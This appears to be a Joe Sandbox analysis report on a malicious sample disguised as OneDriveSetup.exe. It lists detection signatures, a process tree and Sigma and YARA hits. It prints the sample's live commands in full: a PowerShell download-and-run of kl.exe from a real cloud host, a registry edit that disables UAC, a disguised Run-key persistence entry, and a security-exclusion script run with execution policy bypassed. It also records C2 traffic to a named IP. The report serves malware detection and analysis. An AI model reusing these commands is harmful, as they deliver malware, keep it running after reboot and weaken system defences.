Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OneDriveSetup.exe

Overview

General Information

Sample name:OneDriveSetup.exe
Analysis ID:1664120
MD5:a660caaf7011a3ad1c057f43d481a4d9
SHA1:ec04c2059e2ae95204a168238a786a97b27acd12
SHA256:2d5d5d3b215efb94e74aa3f719e35f75d41f52b725bc06ea89ee8c5d1910570b
Tags:exeuser-smica83
Infos:

Detection

Score:82
Range:0 - 100
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Disables UAC (registry)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the DNS server
Modifies the windows firewall
Performs a network lookup / discovery via ARP
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample is not signed and drops a device driver
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses cmd line tools excessively to alter registry or file data
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Tap Installer Execution
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • OneDriveSetup.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\OneDriveSetup.exe" MD5: A660CAAF7011A3AD1C057F43D481A4D9)
    • cmd.exe (PID: 2920 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7656 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • powershell.exe (PID: 4496 cmdline: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • bin.exe (PID: 736 cmdline: "C:\Users\Public\Videos\bin.exe" MD5: DBB5F3B1A28CCFADB2DA212BB0539F42)
        • powershell.exe (PID: 756 cmdline: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 2768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tapinstall.exe (PID: 2576 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
          • conhost.exe (PID: 4008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tapinstall.exe (PID: 3792 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
          • conhost.exe (PID: 528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tapinstall.exe (PID: 4920 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
          • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4732 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 6492 cmdline: netsh advfirewall firewall Delete rule name=lets MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • cmd.exe (PID: 5108 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 2928 cmdline: netsh advfirewall firewall Delete rule name=lets.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • cmd.exe (PID: 7884 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 8152 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • cmd.exe (PID: 3640 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 7332 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • cmd.exe (PID: 2344 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsVPN MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • netsh.exe (PID: 1436 cmdline: netsh advfirewall firewall Delete rule name=LetsVPN MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • LetsPRO.exe (PID: 1696 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework MD5: B364262CA78E5636DBA568EDC36B7636)
          • LetsPRO.exe (PID: 4688 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe" checkNetFramework MD5: 3C9BED8471BE62A072A6A289EBBA3E13)
        • LetsPRO.exe (PID: 3756 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" MD5: B364262CA78E5636DBA568EDC36B7636)
          • LetsPRO.exe (PID: 1304 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe" MD5: 3C9BED8471BE62A072A6A289EBBA3E13)
            • cmd.exe (PID: 6360 cmdline: "cmd.exe" /C ipconfig /all MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • ipconfig.exe (PID: 6544 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
            • cmd.exe (PID: 7136 cmdline: "cmd.exe" /C route print MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • ROUTE.EXE (PID: 7520 cmdline: route print MD5: C563191ED28A926BCFDB1071374575F1)
            • cmd.exe (PID: 6968 cmdline: "cmd.exe" /C arp -a MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • ARP.EXE (PID: 7320 cmdline: arp -a MD5: 4D3943EDBC9C7E18DC3469A21B30B3CE)
    • cmd.exe (PID: 872 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250413054815\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 5428 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • reg.exe (PID: 7472 cmdline: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7768 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8016 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 8052 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 8092 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • sppsvc.exe (PID: 8120 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 8172 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7252 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 2292 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Agghosts.exe (PID: 5864 cmdline: "C:\Users\Public\Music\20250413054815\Agghosts.exe" MD5: 2A24DCD41BC3C5B5F7ECEDA525786578)
  • Agghosts.exe (PID: 2668 cmdline: "C:\Users\Public\Music\20250413054815\Agghosts.exe" MD5: 2A24DCD41BC3C5B5F7ECEDA525786578)
  • svchost.exe (PID: 4520 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • drvinst.exe (PID: 5028 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\letsvpn\driver" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 5000 cmdline: DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000118" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
  • svchost.exe (PID: 4972 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6400 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6608 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • WmiApSrv.exe (PID: 6760 cmdline: C:\Windows\system32\wbem\WmiApSrv.exe MD5: 9A48D32D7DBA794A40BF030DA500603B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Videos\download_and_run.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    C:\Program Files (x86)\letsvpn\app-3.12.2\libwin.dllJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000017.00000003.1653704947.0000000002822000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        Process Memory Space: OneDriveSetup.exe PID: 7736JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: bin.exe PID: 736JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            59.2.LetsPRO.exe.68b70000.21.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_4496.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Execution from Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Music\20250413054815\Agghosts.exe" , CommandLine: "C:\Users\Public\Music\20250413054815\Agghosts.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Music\20250413054815\Agghosts.exe, NewProcessName: C:\Users\Public\Music\20250413054815\Agghosts.exe, OriginalFileName: C:\Users\Public\Music\20250413054815\Agghosts.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7584, ProcessCommandLine: "C:\Users\Public\Music\20250413054815\Agghosts.exe" , ProcessId: 5864, ProcessName: Agghosts.exe
                Sigma detected: Parent in Public Folder Suspicious Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Videos\bin.exe", ParentImage: C:\Users\Public\Videos\bin.exe, ParentProcessId: 736, ParentProcessName: bin.exe, ProcessCommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , ProcessId: 756, ProcessName: powershell.exe
                Sigma detected: PowerShell DownloadFile
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", ProcessId: 4496, ProcessName: powershell.exe
                Sigma detected: Suspicious Program Location with Network Connections
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 143.92.56.59, DestinationIsIpv6: false, DestinationPort: 6666, EventID: 3, Image: C:\Users\Public\Music\20250413054815\Agghosts.exe, Initiated: true, ProcessId: 5864, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49721
                Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
                Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4496, TargetFilename: C:\Users\Public\Videos\bin.exe
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Videos\bin.exe", ParentImage: C:\Users\Public\Videos\bin.exe, ParentProcessId: 736, ParentProcessName: bin.exe, ProcessCommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , ProcessId: 756, ProcessName: powershell.exe
                Sigma detected: Communication To Uncommon Destination Ports
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 143.92.56.59, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Users\Public\Music\20250413054815\Agghosts.exe, Initiated: true, ProcessId: 5864, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\programdata\lnk\dick.lnk, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 7472, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service
                Sigma detected: Direct Autorun Keys Modification
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f, CommandLine: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f, CommandLine|base64offset|contains: i, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\OneDriveSetup.exe", ParentImage: C:\Users\user\Desktop\OneDriveSetup.exe, ParentProcessId: 7736, ParentProcessName: OneDriveSetup.exe, ProcessCommandLine: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f, ProcessId: 7472, ProcessName: reg.exe
                Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exe, ProcessId: 1304, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2y1uyrfg.mab.ps1
                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4496, TargetFilename: C:\Users\Public\Videos\bin.exe
                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f, CommandLine: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f, CommandLine|base64offset|contains: i, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\OneDriveSetup.exe", ParentImage: C:\Users\user\Desktop\OneDriveSetup.exe, ParentProcessId: 7736, ParentProcessName: OneDriveSetup.exe, ProcessCommandLine: "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f, ProcessId: 7472, ProcessName: reg.exe
                Sigma detected: PowerShell Download Pattern
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", ProcessId: 4496, ProcessName: powershell.exe
                Sigma detected: PowerShell Web Download
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", ProcessId: 4496, ProcessName: powershell.exe
                Sigma detected: Tap Installer Execution
                Source: Process startedAuthor: Daniil Yugoslavskiy, Ian Davis, oscd.community: Data: Command: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, NewProcessName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, OriginalFileName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, ParentCommandLine: "C:\Users\Public\Videos\bin.exe", ParentImage: C:\Users\Public\Videos\bin.exe, ParentProcessId: 736, ParentProcessName: bin.exe, ProcessCommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, ProcessId: 2576, ProcessName: tapinstall.exe
                Sigma detected: Usage Of Web Request Commands And Cmdlets
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')", ProcessId: 4496, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
